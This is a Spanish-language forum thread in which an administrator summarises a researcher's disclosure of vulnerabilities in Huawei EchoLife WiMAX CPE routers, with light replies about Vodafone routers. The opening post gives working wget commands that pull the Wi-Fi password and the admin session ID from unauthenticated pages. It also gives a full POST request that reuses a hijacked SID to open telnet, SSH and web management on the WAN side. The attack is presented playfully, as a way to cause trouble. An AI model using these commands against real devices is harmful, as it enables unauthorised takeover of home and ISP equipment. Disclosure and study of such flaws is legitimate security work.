Será difícil hacer lo peor que Huawei con sus Wimax... (Pagina 1) / Huawei / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 03-12-2015 02:42:47

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,056

Será difícil hacer lo peor que Huawei con sus Wimax...

Florilegio de brechas de seguridad de las mas chungas en los "Wimax" de Huawei

wimax_1.jpg

Fuentes :

Ver también :

Pierre KIM vuelve a "liar-la" (ha desvelado múltiples brechas en routers totolink) pero esta vez se las ha visto con el gigante Chino Huawei.
Es que con Huawei... todo es posible. Y no lo digo como un cumplido.
Abrochar el cinturón y empieza el viaje en los bajos fondos de lo peor de lo peor a nivel de seguridad...
Solo acordate que huawei es hoy en día el líder mundial del mercado de CPE big_smile

BM6XX(x) : El wimax para pobres

Huawei tienen brechas en sus productos los mas pijos... Así que imaginate como tienen a las cosas destinadas a los pobres big_smile
Pierre KIM ha estudiado el BM626e de la empresa MTN (Costa de Marfil)
El dispositivo gasta un firmware V100R001CIVC24B010 que se encuentra en otros modelos.

Lo que no da esta lista de modelos afectados :

  • EchoLife BM626e WiMAX CPE

  • EchoLife BM626 WiMAX CPE

  • EchoLife BM635 WiMAX CPE

  • EchoLife BM632 WiMAX CPE

  • EchoLife BM631a WiMAX CPE

  • EchoLife BM632w WiMAX CPE

  • EchoLife BM652 WiMAX CPE

   Upss...
Modelos aún vendidos y empleados en varios países...
Aquí tenéis una lista no exhaustiva de ISP/países dónde encontrar un joya de estas tongue

  • MTN CI (Cote d'Ivoire)

  • Iran Cell (Iran)

  • Irak Telecom (Irak)

  • Libyamax (Libya)

  • Globe Telecom (Philippines)

  • Zain Bahrain (Bahrain)

  • FreshTel (Ukraine)

Brecha uno : Obtención de información sin privilegios

Podemos pillar todo lo disponible con una sola linea de comando

wget http://192.168.1.1/check.html; less check.html

o con curl... usted elige.
En fin; se puede acceder a este pagina sin credenciales y contiene mucha información (por ejemplo el pass wifi) 

Brecha dos : robo de sesión

Si el administrador esta conectado ( o no esta desconectado del todo...)  es posible robarle fácilmente el numero de identificación para usarlo uno mismo.
Podemos ir directo - por ejemplo - en

http://192.168.1.1/static/deviceinfo.html

Se encuentra la ID de sessión de administrador - o bien SID) - en las fuentes java de la pagina
ejemplo :

sid="SID24188"

Del mismo modo que anteriormente hay un "protección" en java... que nos saltamos fácilmente gracias a nuestras herramientas de consola linux

wget http://192.168.1.1/wimax/security.html ; less security.html
brecha uno + brecha dos = Un montón de problemas

Una vez que tenemos el SID podemos...

  • modificar la configuración WLAN

  • la conf. WAN

  • la conf. LAN

  • Activar-abrir  HTTP, HTTPS, TELNET, SSH

  • Jugar con el DMZ

  • Redirigir puertos

  • Instalar un firmware traficado

etc...

Un ejemplo ilustrativo de como proceder para liar-la gorda

Abrir y activar puertos http + https + ssh + telnet tanto en la red por cable que en la red wifi.

Haríamos así :

wget --no-cookies --header "Cookie: LoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1; ThirdMenu=User_2_1_0" --post-data='WWW_SID=SID24188&REDIRECT=acl.html&SERVICE=mini_httpd%2Cmini_httpsd%2Ctelnetd%2Cdropbear&SLEEP=2&HTTPD_ENABLE=1&HTTPSD_ENABLE=1&MGMT_WEB_WAN=1&MGMT_TELNET_LAN=1&MGMT_TELNET_WAN=1&MGMT_SSH_LAN=1&MGMT_SSH_WAN=1&HTTPD_PORT=80&httpslan=getValue%28&HTTPSD_PORT=443&TEL NETD_PORT=23&SSHD_PORT=22' http://192.168.1.1/basic/mtk.cgi

Modificamos asi los parámetros de mtk.cgi
Para que funcione hay que pillar el SID como indicado anteriormente y poner lo en lugar del puesto en ejemplo

Hay mas ejemplos de lineas de comandos para hacer miserias en el blog de Pierre KIM

Para cerrar este tema un gran sorpresa...
Tengo el inmenso placer de invitarles a nuestro "grande concurso de navidades".:)

Los diez primeros en responder correctamente recibirán un Wimax Huawei BM626e venido directo de Costa de Marfil. cool *
* Solo que tendrán que pagar ellos mismos los gastos de porte (Se hace con camellos)
* Hay que saber que hay que pasar por varias aduanas (No : Los camellos no vuelan, Son los dromedarios que vuelan...) y entonces esto aumenta el coste - varios policías por sobornar...

Empieza el juego :

Una de las personas en esta foto es el encargado del proyecto Wimax de Huawei...

wimax_2.jpg

            ...Encuentra-la...
     ¡ Y el Wimax Huawei es tuyo !

* indicio : Este individuo come muchos bikinis

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 08-12-2015 17:21:56

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 205

Re: Será difícil hacer lo peor que Huawei con sus Wimax...

salu2
no se quien es jaja
veo que ultimamente por mi zona hay nuevos huawei con wps desavilitado son de vodafone
pero no pone que sean de vodafone los nombres de red son el modelo y 4 caracteres
ejemplo : Huawei-B310 36A4

clave de 11 digitos todo mayusculas numeros y letras
tambien cada 5 o 10 minutos te deja sin acceso a internet obligando a volver a conectarse aquellos que se conecten o hakeen

Ultima edición por dynyly (08-12-2015 17:46:17)

Desconectado

#3 08-12-2015 17:56:07

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,056

Re: Será difícil hacer lo peor que Huawei con sus Wimax...

ejemplo : Huawei-B310 36A4

No tenemos de estos por aquí... Y no es la primera vez que leo acerca de este tipo de essid en unas zonas de españa.

tambien cada 5 o 10 minutos te deja sin acceso a internet obligando a volver a conectarse aquellos que se conecten o hakeen

¡Vaya rolló! big_smile

no se quien es jaja

Vale.. Como eres tu tienes derecho a tres respuestas big_smile

Desconectado

#4 10-12-2015 19:51:57

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 205

Re: Será difícil hacer lo peor que Huawei con sus Wimax...

salu2
soy del norte de españa (asturias)
por eso comentaba lo de los nuevos routers de vodafone ...pero yo no se buscarle vulenarbilidades por telnet ;o recogida de datos como tu ...no veo patron en la contraseña pues empieza por ELJxxxxxxxx no quiero poner mi clave lol:lol:
daba por echo que fijo que habrias oido de este nuevo tipo de routers de vodafone pero me llamo la atencion que vodafone no cambia contarseñas por defecto de fabricante y ya no quieren que poner nombre de red vodafone big_smile:D
;pero se lo han currao un poco con estos nuevos routers es hasta bonito el modelo que comento en color negro.
----
a fijo que es el de la izquierda el Jose Romano que me parece que le va mucho lo blanco ...ademas de los vikinis

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Belgrano Windalo por Patcher
2 34 Hoy 05:39:22 por Fisgon
9 80 Hoy 00:45:10 por dynyly
11 176 Hoy 00:44:17 por Patcher
Hola! por Ike
3 33 Ayer 22:36:24 por Flashed
0 14 Ayer 19:25:20 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: Ike
Usuarios registrados conectados: 0
Invitados conectados: 3

Estadisticas de los foros

Número total de usuarios registrados: 356
Número total de temas: 618
Número total de mensajes: 4,234

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20